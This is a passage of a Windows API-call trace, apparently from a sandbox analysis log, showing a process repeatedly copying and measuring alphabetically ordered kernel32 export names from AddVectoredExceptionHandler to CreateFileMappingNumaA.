returned="AddVectoredExceptionHandler" [0181.107] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.107] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.107] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.107] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.107] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.107] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.107] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.107] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.107] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.107] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.107] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.107] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.107] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.107] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.107] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.107] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.107] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.108] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.108] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.108] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.108] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.108] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.108] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.108] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.108] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.108] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.108] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.108] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.108] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.108] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.108] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.108] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.108] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.108] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.108] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.108] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.109] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.109] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.109] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.109] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.109] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.109] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.114] lstrlenA (lpString="BEEP") returned 4 [0181.114] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.114] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.115] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.116] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.117] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.118] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.122] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.122] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.319] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.319] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.319] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.319] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.319] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.320] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.320] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.320] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.320] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.320] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.320] lstrlenA (lpString="CANCELIO") returned 8 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.320] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.320] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.320] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.320] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.320] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.320] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.320] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.320] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.320] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.320] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.320] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.320] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.321] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.321] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.321] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.321] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.321] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.321] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.321] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.321] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.321] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.321] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.321] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.321] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.321] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.321] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.321] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.321] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.321] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.321] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.321] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.322] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.322] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.322] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.322] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.322] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.322] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.322] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.322] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.322] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.322] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.322] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.322] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.322] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.322] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.322] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.322] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.322] lstrlenA (lpString="COPYFILEA") returned 9 [0181.322] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.323] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.323] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.323] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.323] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.323] lstrlenA (lpString="COPYFILEW") returned 9 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.323] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.323] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.323] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.323] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.323] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.323] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.323] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.323] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.323] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.323] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.323] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.323] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.323] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.323] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.324] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.324] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.324] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.324] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.324] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.324] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.324] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.324] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 